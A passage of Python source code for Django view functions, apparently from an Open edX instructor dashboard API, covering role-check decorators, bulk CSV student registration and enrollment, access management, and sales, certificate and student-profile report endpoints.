return HttpResponseNotFound()
access = auth.user_has_role(request.user, CourseSalesAdminRole(course_key))
if access:
return func(request, course_id)
else:
return HttpResponseForbidden()
return wrapped
def require_finance_admin(func):
"""
Decorator for checking finance administrator access before executing an HTTP endpoint. This decorator
is designed to be used for a request based action on a course. It assumes that there will be a
request object as well as a course_id attribute to leverage to check course level privileges.
If the user does not have privileges for this operation, this will return HttpResponseForbidden (403).
"""
def wrapped(request, course_id): # pylint: disable=missing-docstring
try:
course_key = CourseKey.from_string(course_id)
except InvalidKeyError:
log.error(u"Unable to find course with course key %s", course_id)
return HttpResponseNotFound()
access = auth.user_has_role(request.user, CourseFinanceAdminRole(course_key))
if access:
return func(request, course_id)
else:
return HttpResponseForbidden()
return wrapped
EMAIL_INDEX = 0
USERNAME_INDEX = 1
NAME_INDEX = 2
COUNTRY_INDEX = 3
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def register_and_enroll_students(request, course_id): # pylint: disable=too-many-statements
"""
Create new account and Enroll students in this course.
Passing a csv file that contains a list of students.
Order in csv should be the following email = 0; username = 1; name = 2; country = 3.
Requires staff access.
-If the email address and username already exists and the user is enrolled in the course,
do nothing (including no email gets sent out)
-If the email address already exists, but the username is different,
match on the email address only and continue to enroll the user in the course using the email address
as the matching criteria. Note the change of username as a warning message (but not a failure). Send a standard enrollment email
which is the same as the existing manual enrollment
-If the username already exists (but not the email), assume it is a different user and fail to create the new account.
The failure will be messaged in a response in the browser.
"""
if not microsite.get_value('ALLOW_AUTOMATED_SIGNUPS', settings.FEATURES.get('ALLOW_AUTOMATED_SIGNUPS', False)):
return HttpResponseForbidden()
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
warnings = []
row_errors = []
general_errors = []
# for white labels we use 'shopping cart' which uses CourseMode.DEFAULT_SHOPPINGCART_MODE_SLUG as
# course mode for creating course enrollments.
if CourseMode.is_white_label(course_id):
course_mode = CourseMode.DEFAULT_SHOPPINGCART_MODE_SLUG
else:
course_mode = None
if 'students_list' in request.FILES:
students = []
try:
upload_file = request.FILES.get('students_list')
if upload_file.name.endswith('.csv'):
students = [row for row in csv.reader(upload_file.read().splitlines())]
course = get_course_by_id(course_id)
else:
general_errors.append({
'username': '', 'email': '',
'response': _('Make sure that the file you upload is in CSV format with no extraneous characters or rows.')
})
except Exception: # pylint: disable=broad-except
general_errors.append({
'username': '', 'email': '', 'response': _('Could not read uploaded file.')
})
finally:
upload_file.close()
generated_passwords = []
row_num = 0
for student in students:
row_num = row_num + 1
# verify that we have exactly four columns in every row but allow for blank lines
if len(student) != 4:
if len(student) > 0:
general_errors.append({
'username': '',
'email': '',
'response': _('Data in row #{row_num} must have exactly four columns: email, username, full name, and country').format(row_num=row_num)
})
continue
# Iterate each student in the uploaded csv file.
email = student[EMAIL_INDEX]
username = student[USERNAME_INDEX]
name = student[NAME_INDEX]
country = student[COUNTRY_INDEX][:2]
email_params = get_email_params(course, True, secure=request.is_secure())
try:
validate_email(email) # Raises ValidationError if invalid
except ValidationError:
row_errors.append({
'username': username, 'email': email, 'response': _('Invalid email {email_address}.').format(email_address=email)})
else:
if User.objects.filter(email=email).exists():
# Email address already exists. assume it is the correct user
# and just register the user in the course and send an enrollment email.
user = User.objects.get(email=email)
# see if it is an exact match with email and username
# if it's not an exact match then just display a warning message, but continue onwards
if not User.objects.filter(email=email, username=username).exists():
warning_message = _(
'An account with email {email} exists but the provided username {username} '
'is different. Enrolling anyway with {email}.'
).format(email=email, username=username)
warnings.append({
'username': username, 'email': email, 'response': warning_message
})
log.warning(u'email %s already exist', email)
else:
log.info(
u"user already exists with username '%s' and email '%s'",
username,
email
)
# enroll a user if it is not already enrolled.
if not CourseEnrollment.is_enrolled(user, course_id):
# Enroll user to the course and add manual enrollment audit trail
create_manual_course_enrollment(
user=user,
course_id=course_id,
mode=course_mode,
enrolled_by=request.user,
reason='Enrolling via csv upload',
state_transition=UNENROLLED_TO_ENROLLED,
)
enroll_email(course_id=course_id, student_email=email, auto_enroll=True, email_students=True, email_params=email_params)
else:
# This email does not yet exist, so we need to create a new account
# If username already exists in the database, then create_and_enroll_user
# will raise an IntegrityError exception.
password = generate_unique_password(generated_passwords)
errors = create_and_enroll_user(
email, username, name, country, password, course_id, course_mode, request.user, email_params
)
row_errors.extend(errors)
else:
general_errors.append({
'username': '', 'email': '', 'response': _('File is not attached.')
})
results = {
'row_errors': row_errors,
'general_errors': general_errors,
'warnings': warnings
}
return JsonResponse(results)
def generate_random_string(length):
"""
Create a string of random characters of specified length
"""
chars = [
char for char in string.ascii_uppercase + string.digits + string.ascii_lowercase
if char not in 'aAeEiIoOuU1l'
]
return string.join((random.choice(chars) for __ in range(length)), '')
def generate_unique_password(generated_passwords, password_length=12):
"""
generate a unique password for each student.
"""
password = generate_random_string(password_length)
while password in generated_passwords:
password = generate_random_string(password_length)
generated_passwords.append(password)
return password
def create_user_and_user_profile(email, username, name, country, password):
"""
Create a new user, add a new Registration instance for letting user verify its identity and create a user profile.
:param email: user's email address
:param username: user's username
:param name: user's name
:param country: user's country
:param password: user's password
:return: User instance of the new user.
"""
user = User.objects.create_user(username, email, password)
reg = Registration()
reg.register(user)
profile = UserProfile(user=user)
profile.name = name
profile.country = country
profile.save()
return user
def create_manual_course_enrollment(user, course_id, mode, enrolled_by, reason, state_transition):
"""
Create course enrollment for the given student and create manual enrollment audit trail.
:param user: User who is to enroll in course
:param course_id: course identifier of the course in which to enroll the user.
:param mode: mode for user enrollment, e.g. 'honor', 'audit' etc.
:param enrolled_by: User who made the manual enrollment entry (usually instructor or support)
:param reason: Reason behind manual enrollment
:param state_transition: state transition denoting whether student enrolled from un-enrolled,
un-enrolled from enrolled etc.
:return CourseEnrollment instance.
"""
enrollment_obj = CourseEnrollment.enroll(user, course_id, mode=mode)
ManualEnrollmentAudit.create_manual_enrollment_audit(
enrolled_by, user.email, state_transition, reason, enrollment_obj
)
log.info(u'user %s enrolled in the course %s', user.username, course_id)
return enrollment_obj
def create_and_enroll_user(email, username, name, country, password, course_id, course_mode, enrolled_by, email_params):
"""
Create a new user and enroll him/her to the given course, return list of errors in the following format
Error format:
each error is key-value pait dict with following key-value pairs.
1. username: username of the user to enroll
1. email: email of the user to enroll
1. response: readable error message
:param email: user's email address
:param username: user's username
:param name: user's name
:param country: user's country
:param password: user's password
:param course_id: course identifier of the course in which to enroll the user.
:param course_mode: mode for user enrollment, e.g. 'honor', 'audit' etc.
:param enrolled_by: User who made the manual enrollment entry (usually instructor or support)
:param email_params: information to send to the user via email
:return: list of errors
"""
errors = list()
try:
with transaction.atomic():
# Create a new user
user = create_user_and_user_profile(email, username, name, country, password)
# Enroll user to the course and add manual enrollment audit trail
create_manual_course_enrollment(
user=user,
course_id=course_id,
mode=course_mode,
enrolled_by=enrolled_by,
reason='Enrolling via csv upload',
state_transition=UNENROLLED_TO_ENROLLED,
)
except IntegrityError:
errors.append({
'username': username, 'email': email, 'response': _('Username {user} already exists.').format(user=username)
})
except Exception as ex: # pylint: disable=broad-except
log.exception(type(ex).__name__)
errors.append({
'username': username, 'email': email, 'response': type(ex).__name__,
})
else:
try:
# It's a new user, an email will be sent to each newly created user.
email_params.update({
'message': 'account_creation_and_enrollment',
'email_address': email,
'password': password,
'platform_name': microsite.get_value('platform_name', settings.PLATFORM_NAME),
})
send_mail_to_student(email, email_params)
except Exception as ex: # pylint: disable=broad-except
log.exception(
"Exception '{exception}' raised while sending email to new user.".format(exception=type(ex).__name__)
)
errors.append({
'username': username,
'email': email,
'response':
_("Error '{error}' while sending email to new user (user email={email}). "
"Without the email student would not be able to login. "
"Please contact support for further information.").format(error=type(ex).__name__, email=email),
})
else:
log.info(u'email sent to new created user at %s', email)
return errors
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params(action="enroll or unenroll", identifiers="stringified list of emails and/or usernames")
def students_update_enrollment(request, course_id):
"""
Enroll or unenroll students by email.
Requires staff access.
Query Parameters:
- action in ['enroll', 'unenroll']
- identifiers is string containing a list of emails and/or usernames separated by anything split_input_list can handle.
- auto_enroll is a boolean (defaults to false)
If auto_enroll is false, students will be allowed to enroll.
If auto_enroll is true, students will be enrolled as soon as they register.
- email_students is a boolean (defaults to false)
If email_students is true, students will be sent email notification
If email_students is false, students will not be sent email notification
Returns an analog to this JSON structure: {
"action": "enroll",
"auto_enroll": false,
"results": [
{
"email": "testemail@test.org",
"before": {
"enrollment": false,
"auto_enroll": false,
"user": true,
"allowed": false
},
"after": {
"enrollment": true,
"auto_enroll": false,
"user": true,
"allowed": false
}
}
]
}
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
action = request.POST.get('action')
identifiers_raw = request.POST.get('identifiers')
identifiers = _split_input_list(identifiers_raw)
auto_enroll = request.POST.get('auto_enroll') in ['true', 'True', True]
email_students = request.POST.get('email_students') in ['true', 'True', True]
is_white_label = CourseMode.is_white_label(course_id)
reason = request.POST.get('reason')
if is_white_label:
if not reason:
return JsonResponse(
{
'action': action,
'results': [{'error': True}],
'auto_enroll': auto_enroll,
}, status=400)
enrollment_obj = None
state_transition = DEFAULT_TRANSITION_STATE
email_params = {}
if email_students:
course = get_course_by_id(course_id)
email_params = get_email_params(course, auto_enroll, secure=request.is_secure())
results = []
for identifier in identifiers:
# First try to get a user object from the identifer
user = None
email = None
language = None
try:
user = get_student_from_identifier(identifier)
except User.DoesNotExist:
email = identifier
else:
email = user.email
language = get_user_email_language(user)
try:
# Use django.core.validators.validate_email to check email address
# validity (obviously, cannot check if email actually /exists/,
# simply that it is plausibly valid)
validate_email(email) # Raises ValidationError if invalid
if action == 'enroll':
before, after, enrollment_obj = enroll_email(
course_id, email, auto_enroll, email_students, email_params, language=language
)
before_enrollment = before.to_dict()['enrollment']
before_user_registered = before.to_dict()['user']
before_allowed = before.to_dict()['allowed']
after_enrollment = after.to_dict()['enrollment']
after_allowed = after.to_dict()['allowed']
if before_user_registered:
if after_enrollment:
if before_enrollment:
state_transition = ENROLLED_TO_ENROLLED
else:
if before_allowed:
state_transition = ALLOWEDTOENROLL_TO_ENROLLED
else:
state_transition = UNENROLLED_TO_ENROLLED
else:
if after_allowed:
state_transition = UNENROLLED_TO_ALLOWEDTOENROLL
elif action == 'unenroll':
before, after = unenroll_email(
course_id, email, email_students, email_params, language=language
)
before_enrollment = before.to_dict()['enrollment']
before_allowed = before.to_dict()['allowed']
enrollment_obj = CourseEnrollment.get_enrollment(user, course_id)
if before_enrollment:
state_transition = ENROLLED_TO_UNENROLLED
else:
if before_allowed:
state_transition = ALLOWEDTOENROLL_TO_UNENROLLED
else:
state_transition = UNENROLLED_TO_UNENROLLED
else:
return HttpResponseBadRequest(strip_tags(
"Unrecognized action '{}'".format(action)
))
except ValidationError:
# Flag this email as an error if invalid, but continue checking
# the remaining in the list
results.append({
'identifier': identifier,
'invalidIdentifier': True,
})
except Exception as exc: # pylint: disable=broad-except
# catch and log any exceptions
# so that one error doesn't cause a 500.
log.exception(u"Error while #{}ing student")
log.exception(exc)
results.append({
'identifier': identifier,
'error': True,
})
else:
ManualEnrollmentAudit.create_manual_enrollment_audit(
request.user, email, state_transition, reason, enrollment_obj
)
results.append({
'identifier': identifier,
'before': before.to_dict(),
'after': after.to_dict(),
})
response_payload = {
'action': action,
'results': results,
'auto_enroll': auto_enroll,
}
return JsonResponse(response_payload)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('instructor')
@common_exceptions_400
@require_post_params(
identifiers="stringified list of emails and/or usernames",
action="add or remove",
)
def bulk_beta_modify_access(request, course_id):
"""
Enroll or unenroll users in beta testing program.
Query parameters:
- identifiers is string containing a list of emails and/or usernames separated by
anything split_input_list can handle.
- action is one of ['add', 'remove']
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
action = request.POST.get('action')
identifiers_raw = request.POST.get('identifiers')
identifiers = _split_input_list(identifiers_raw)
email_students = request.POST.get('email_students') in ['true', 'True', True]
auto_enroll = request.POST.get('auto_enroll') in ['true', 'True', True]
results = []
rolename = 'beta'
course = get_course_by_id(course_id)
email_params = {}
if email_students:
secure = request.is_secure()
email_params = get_email_params(course, auto_enroll=auto_enroll, secure=secure)
for identifier in identifiers:
try:
error = False
user_does_not_exist = False
user = get_student_from_identifier(identifier)
if action == 'add':
allow_access(course, user, rolename)
elif action == 'remove':
revoke_access(course, user, rolename)
else:
return HttpResponseBadRequest(strip_tags(
"Unrecognized action '{}'".format(action)
))
except User.DoesNotExist:
error = True
user_does_not_exist = True
# catch and log any unexpected exceptions
# so that one error doesn't cause a 500.
except Exception as exc: # pylint: disable=broad-except
log.exception(u"Error while #{}ing student")
log.exception(exc)
error = True
else:
# If no exception thrown, see if we should send an email
if email_students:
send_beta_role_email(action, user, email_params)
# See if we should autoenroll the student
if auto_enroll:
# Check if student is already enrolled
if not CourseEnrollment.is_enrolled(user, course_id):
CourseEnrollment.enroll(user, course_id)
finally:
# Tabulate the action result of this email address
results.append({
'identifier': identifier,
'error': error,
'userDoesNotExist': user_does_not_exist
})
response_payload = {
'action': action,
'results': results,
}
return JsonResponse(response_payload)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('instructor')
@common_exceptions_400
@require_query_params(
unique_student_identifier="email or username of user to change access",
rolename="'instructor', 'staff', 'beta', or 'ccx_coach'",
action="'allow' or 'revoke'"
)
def modify_access(request, course_id):
"""
Modify staff/instructor access of other user.
Requires instructor access.
NOTE: instructors cannot remove their own instructor access.
Query parameters:
unique_student_identifer is the target user's username or email
rolename is one of ['instructor', 'staff', 'beta', 'ccx_coach']
action is one of ['allow', 'revoke']
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
course = get_course_with_access(
request.user, 'instructor', course_id, depth=None
)
try:
user = get_student_from_identifier(request.GET.get('unique_student_identifier'))
except User.DoesNotExist:
response_payload = {
'unique_student_identifier': request.GET.get('unique_student_identifier'),
'userDoesNotExist': True,
}
return JsonResponse(response_payload)
# Check that user is active, because add_users
# in common/djangoapps/student/roles.py fails
# silently when we try to add an inactive user.
if not user.is_active:
response_payload = {
'unique_student_identifier': user.username,
'inactiveUser': True,
}
return JsonResponse(response_payload)
rolename = request.GET.get('rolename')
action = request.GET.get('action')
if rolename not in ROLES:
error = strip_tags("unknown rolename '{}'".format(rolename))
log.error(error)
return HttpResponseBadRequest(error)
# disallow instructors from removing their own instructor access.
if rolename == 'instructor' and user == request.user and action != 'allow':
response_payload = {
'unique_student_identifier': user.username,
'rolename': rolename,
'action': action,
'removingSelfAsInstructor': True,
}
return JsonResponse(response_payload)
if action == 'allow':
allow_access(course, user, rolename)
elif action == 'revoke':
revoke_access(course, user, rolename)
else:
return HttpResponseBadRequest(strip_tags(
"unrecognized action '{}'".format(action)
))
response_payload = {
'unique_student_identifier': user.username,
'rolename': rolename,
'action': action,
'success': 'yes',
}
return JsonResponse(response_payload)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('instructor')
@require_query_params(rolename="'instructor', 'staff', or 'beta'")
def list_course_role_members(request, course_id):
"""
List instructors and staff.
Requires instructor access.
rolename is one of ['instructor', 'staff', 'beta', 'ccx_coach']
Returns JSON of the form {
"course_id": "some/course/id",
"staff": [
{
"username": "staff1",
"email": "staff1@example.org",
"first_name": "Joe",
"last_name": "Shmoe",
}
]
}
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
course = get_course_with_access(
request.user, 'instructor', course_id, depth=None
)
rolename = request.GET.get('rolename')
if rolename not in ROLES:
return HttpResponseBadRequest()
def extract_user_info(user):
""" convert user into dicts for json view """
return {
'username': user.username,
'email': user.email,
'first_name': user.first_name,
'last_name': user.last_name,
}
response_payload = {
'course_id': course_id.to_deprecated_string(),
rolename: map(extract_user_info, list_with_level(
course, rolename
)),
}
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_problem_responses(request, course_id):
"""
Initiate generation of a CSV file containing all student answers
to a given problem.
Responds with JSON
{"status": "... status message ..."}
if initiation is successful (or generation task is already running).
Responds with BadRequest if problem location is faulty.
"""
course_key = CourseKey.from_string(course_id)
problem_location = request.GET.get('problem_location', '')
try:
problem_key = UsageKey.from_string(problem_location)
# Are we dealing with an "old-style" problem location?
run = problem_key.run
if not run:
problem_key = course_key.make_usage_key_from_deprecated_string(problem_location)
if problem_key.course_key != course_key:
raise InvalidKeyError(type(problem_key), problem_key)
except InvalidKeyError:
return JsonResponseBadRequest(_("Could not find problem with this location."))
try:
instructor_task.api.submit_calculate_problem_responses_csv(request, course_key, problem_location)
success_status = _(
"The problem responses report is being created."
" To view the status of the report, see Pending Tasks below."
)
return JsonResponse({"status": success_status})
except AlreadyRunningError:
already_running_status = _(
"A problem responses report generation task is already in progress. "
"Check the 'Pending Tasks' table for the status of the task. "
"When completed, the report will be available for download in the table below."
)
return JsonResponse({"status": already_running_status})
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_grading_config(request, course_id):
"""
Respond with json which contains a html formatted grade summary.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
course = get_course_with_access(
request.user, 'staff', course_id, depth=None
)
grading_config_summary = instructor_analytics.basic.dump_grading_context(course)
response_payload = {
'course_id': course_id.to_deprecated_string(),
'grading_config_summary': grading_config_summary,
}
return JsonResponse(response_payload)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_sale_records(request, course_id, csv=False): # pylint: disable=unused-argument, redefined-outer-name
"""
return the summary of all sales records for a particular course
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
query_features = [
'company_name', 'company_contact_name', 'company_contact_email', 'total_codes', 'total_used_codes',
'total_amount', 'created', 'customer_reference_number', 'recipient_name', 'recipient_email', 'created_by',
'internal_reference', 'invoice_number', 'codes', 'course_id'
]
sale_data = instructor_analytics.basic.sale_record_features(course_id, query_features)
if not csv:
for item in sale_data:
item['created_by'] = item['created_by'].username
response_payload = {
'course_id': course_id.to_deprecated_string(),
'sale': sale_data,
'queried_features': query_features
}
return JsonResponse(response_payload)
else:
header, datarows = instructor_analytics.csvs.format_dictlist(sale_data, query_features)
return instructor_analytics.csvs.create_csv_response("e-commerce_sale_invoice_records.csv", header, datarows)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_sale_order_records(request, course_id): # pylint: disable=unused-argument
"""
return the summary of all sales records for a particular course
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
query_features = [
('id', 'Order Id'),
('company_name', 'Company Name'),
('company_contact_name', 'Company Contact Name'),
('company_contact_email', 'Company Contact Email'),
('logged_in_username', 'Login Username'),
('logged_in_email', 'Login User Email'),
('purchase_time', 'Date of Sale'),
('customer_reference_number', 'Customer Reference Number'),
('recipient_name', 'Recipient Name'),
('recipient_email', 'Recipient Email'),
('bill_to_street1', 'Street 1'),
('bill_to_street2', 'Street 2'),
('bill_to_city', 'City'),
('bill_to_state', 'State'),
('bill_to_postalcode', 'Postal Code'),
('bill_to_country', 'Country'),
('order_type', 'Order Type'),
('status', 'Order Item Status'),
('coupon_code', 'Coupon Code'),
('list_price', 'List Price'),
('unit_cost', 'Unit Price'),
('quantity', 'Quantity'),
('total_discount', 'Total Discount'),
('total_amount', 'Total Amount Paid'),
]
db_columns = [x[0] for x in query_features]
csv_columns = [x[1] for x in query_features]
sale_data = instructor_analytics.basic.sale_order_record_features(course_id, db_columns)
__, datarows = instructor_analytics.csvs.format_dictlist(sale_data, db_columns)
return instructor_analytics.csvs.create_csv_response("e-commerce_sale_order_records.csv", csv_columns, datarows)
@require_level('staff')
@require_POST
def sale_validation(request, course_id):
"""
This method either invalidate or re validate the sale against the invoice number depending upon the event type
"""
try:
invoice_number = request.POST["invoice_number"]
except KeyError:
return HttpResponseBadRequest("Missing required invoice_number parameter")
try:
invoice_number = int(invoice_number)
except ValueError:
return HttpResponseBadRequest(
"invoice_number must be an integer, {value} provided".format(
value=invoice_number
)
)
try:
event_type = request.POST["event_type"]
except KeyError:
return HttpResponseBadRequest("Missing required event_type parameter")
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
try:
obj_invoice = CourseRegistrationCodeInvoiceItem.objects.select_related('invoice').get(
invoice_id=invoice_number,
course_id=course_id
)
obj_invoice = obj_invoice.invoice
except CourseRegistrationCodeInvoiceItem.DoesNotExist: # Check for old type invoices
return HttpResponseNotFound(_("Invoice number '{num}' does not exist.").format(num=invoice_number))
if event_type == "invalidate":
return invalidate_invoice(obj_invoice)
else:
return re_validate_invoice(obj_invoice)
def invalidate_invoice(obj_invoice):
"""
This method invalidate the sale against the invoice number
"""
if not obj_invoice.is_valid:
return HttpResponseBadRequest(_("The sale associated with this invoice has already been invalidated."))
obj_invoice.is_valid = False
obj_invoice.save()
message = _('Invoice number {0} has been invalidated.').format(obj_invoice.id)
return JsonResponse({'message': message})
def re_validate_invoice(obj_invoice):
"""
This method re-validate the sale against the invoice number
"""
if obj_invoice.is_valid:
return HttpResponseBadRequest(_("This invoice is already active."))
obj_invoice.is_valid = True
obj_invoice.save()
message = _('The registration codes for invoice {0} have been re-activated.').format(obj_invoice.id)
return JsonResponse({'message': message})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_issued_certificates(request, course_id):
"""
Responds with JSON if CSV is not required. contains a list of issued certificates.
Arguments:
course_id
Returns:
{"certificates": [{course_id: xyz, mode: 'honor'}, ...]}
"""
course_key = CourseKey.from_string(course_id)
csv_required = request.GET.get('csv', 'false')
query_features = ['course_id', 'mode', 'total_issued_certificate', 'report_run_date']
query_features_names = [
('course_id', _('CourseID')),
('mode', _('Certificate Type')),
('total_issued_certificate', _('Total Certificates Issued')),
('report_run_date', _('Date Report Run'))
]
certificates_data = instructor_analytics.basic.issued_certificates(course_key, query_features)
if csv_required.lower() == 'true':
__, data_rows = instructor_analytics.csvs.format_dictlist(certificates_data, query_features)
return instructor_analytics.csvs.create_csv_response(
'issued_certificates.csv',
[col_header for __, col_header in query_features_names],
data_rows
)
else:
response_payload = {
'certificates': certificates_data,
'queried_features': query_features,
'feature_names': dict(query_features_names)
}
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_students_features(request, course_id, csv=False): # pylint: disable=redefined-outer-name
"""
Respond with json which contains a summary of all enrolled students profile information.
Responds with JSON
{"students": [{-student-info-}, ...]}
TO DO accept requests for different attribute sets.
"""
course_key = CourseKey.from_string(course_id)
course = get_course_by_id(course_key)
available_features = instructor_analytics.basic.AVAILABLE_FEATURES
# Allow for microsites to be able to define additional columns.
# Note that adding additional columns has the potential to break
# the student profile report due to a character limit on the
# asynchronous job input which in this case is a JSON string
# containing the list of columns to include in the report.
# TODO: Refactor the student profile report code to remove the list of columns
# that should be included in the report from the asynchronous job input.
# We need to clone the list because we modify it below
query_features = list(microsite.get_value('student_profile_download_fields', []))
if not query_features:
query_features = [
'id', 'username', 'name', 'email', 'language', 'location',
'year_of_birth', 'gender', 'level_of_education', 'mailing_address',
'goals',
]
# Provide human-friendly and translatable names for these features. These names
# will be displayed in the table generated in data_download.coffee. It is not (yet)
# used as the header row in the CSV, but could be in the future.
query_features_names = {
'id': _('User ID'),
'username': _('Username'),
'name': _('Name'),
'email': _('Email'),
'language': _('Language'),
'location': _('Location'),
'year_of_birth': _('Birth Year'),
'gender': _('Gender'),
'level_of_education': _('Level of Education'),
'mailing_address': _('Mailing Address'),
'goals': _('Goals'),
}
if is_course_cohorted(course.id):
# Translators: 'Cohort' refers to a group of students within a course.
query_features.append('cohort')
query_features_names['cohort'] = _('Cohort')
if course.teams_enabled:
query_features.append('team')
query_features_names['team'] = _('Team')
# For compatibility reasons, city and country should always appear last.
query_features.append('city')
query_features_names['city'] = _('City')
query_features.append('country')
query_features_names['country'] = _('Country')
if not csv:
student_data = instructor_analytics.basic.enrolled_students_features(course_key, query_features)
response_payload = {
'course_id': unicode(course_key),
'students': student_data,
'students_count': len(student_data),
'queried_features': query_features,
'feature_names': query_features_names,
'available_features': available_features,
}
return JsonResponse(response_payload)
else:
try:
instructor_task.api.submit_calculate_students_features_csv(request, course_key, query_features)
success_status = _("The enrolled learner profile report is being created."
" To view the status of the report, see Pending Tasks below.")
return JsonResponse({"status": success_status})
except AlreadyRunningError:
already_running_status = _(
"This enrollment report is currently being created."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete.")
return JsonResponse({"status": already_running_status})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_students_who_may_enroll(request, course_id):
"""
Initiate generation of a CSV file containing information about
students who may enroll in a course.
Responds with JSON
{"status": "... status message ..."}
"""
course_key = CourseKey.from_string(course_id)
query_features = ['email']
try:
instructor_task.api.submit_calculate_may_enroll_csv(request, course_key, query_features)
success_status = _(
"The enrollment report is being created. This report contains"
" information about learners who can enroll in the course."
" To view the status of the report, see Pending Tasks below."
)
return JsonResponse({"status": success_status})
except AlreadyRunningError:
already_running_status = _(
"This enrollment report is currently being created."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete."
)
return JsonResponse({"status": already_running_status})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_POST
@require_level('staff')
def add_users_to_cohorts(request, course_id):
"""
View method that accepts an uploaded file (using key "uploaded-file")
containing cohort assignments for users. This method spawns a celery task
to do the assignments, and a CSV file with results is provided via data downloads.
"""
course_key = SlashSeparatedCourseKey.from_string(course_id)
try:
def validator(file_storage, file_to_validate):
"""
Verifies that the expected columns are present.
"""
with file_storage.open(file_to_validate) as f:
reader = unicodecsv.reader(UniversalNewlineIterator(f), encoding='utf-8')
try:
fieldnames = next(reader)
except StopIteration:
fieldnames = []
msg = None
if "cohort" not in fieldnames:
msg = _("The file must contain a 'cohort' column containing cohort names.")
elif "email" not in fieldnames and "username" not in fieldnames:
msg = _("The file must contain a 'username' column, an 'email' column, or both.")
if msg:
raise FileValidationException(msg)
__, filename = store_uploaded_file(
request, 'uploaded-file', ['.csv'],
course_and_time_based_filename_generator(course_key, "cohorts"),
max_file_size=2000000, # limit to 2 MB
validator=validator
)
# The task will assume the default file storage.
instructor_task.api.submit_cohort_students(request, course_key, filename)
except (FileValidationException, PermissionDenied) as err:
return JsonResponse({"error": unicode(err)}, status=400)
return JsonResponse()
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_coupon_codes(request, course_id): # pylint: disable=unused-argument
"""
Respond with csv which contains a summary of all Active Coupons.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
coupons = Coupon.objects.filter(course_id=course_id)
query_features = [
('code', _('Coupon Code')),
('course_id', _('Course Id')),
('percentage_discount', _('% Discount')),
('description', _('Description')),
('expiration_date', _('Expiration Date')),
('is_active', _('Is Active')),
('code_redeemed_count', _('Code Redeemed Count')),
('total_discounted_seats', _('Total Discounted Seats')),
('total_discounted_amount', _('Total Discounted Amount')),
]
db_columns = [x[0] for x in query_features]
csv_columns = [x[1] for x in query_features]
coupons_list = instructor_analytics.basic.coupon_codes_features(db_columns, coupons, course_id)
__, data_rows = instructor_analytics.csvs.format_dictlist(coupons_list, db_columns)
return instructor_analytics.csvs.create_csv_response('Coupons.csv', csv_columns, data_rows)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_finance_admin
def get_enrollment_report(request, course_id):
"""
get the enrollment report for the particular course.
"""
course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
try:
instructor_task.api.submit_detailed_enrollment_features_csv(request, course_key)
success_status = _("The detailed enrollment report is being created."
" To view the status of the report, see Pending Tasks below.")
return JsonResponse({"status": success_status})
except AlreadyRunningError:
already_running_status = _("The detailed enrollment report is being created."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete.")
return JsonResponse({
"status": already_running_status
})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_finance_admin
def get_exec_summary_report(request, course_id):
"""
get the executive summary report for the particular course.
"""
course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
try:
instructor_task.api.submit_executive_summary_report(request, course_key)
status_response = _("The executive summary report is being created."
" To view the status of the report, see Pending Tasks below.")
except AlreadyRunningError:
status_response = _(
"The executive summary report is currently being created."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete."
)
return JsonResponse({
"status": status_response
})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_course_survey_results(request, course_id):
"""
get the survey results report for the particular course.
"""
course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
try:
instructor_task.api.submit_course_survey_report(request, course_key)
status_response = _("The survey report is being created."
" To view the status of the report, see Pending Tasks below.")
except AlreadyRunningError:
status_response = _(
"The survey report is currently being created."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete."
)
return JsonResponse({
"status": status_response
})
@transaction.non_atomic_requests
@ensure_csrf_cookie
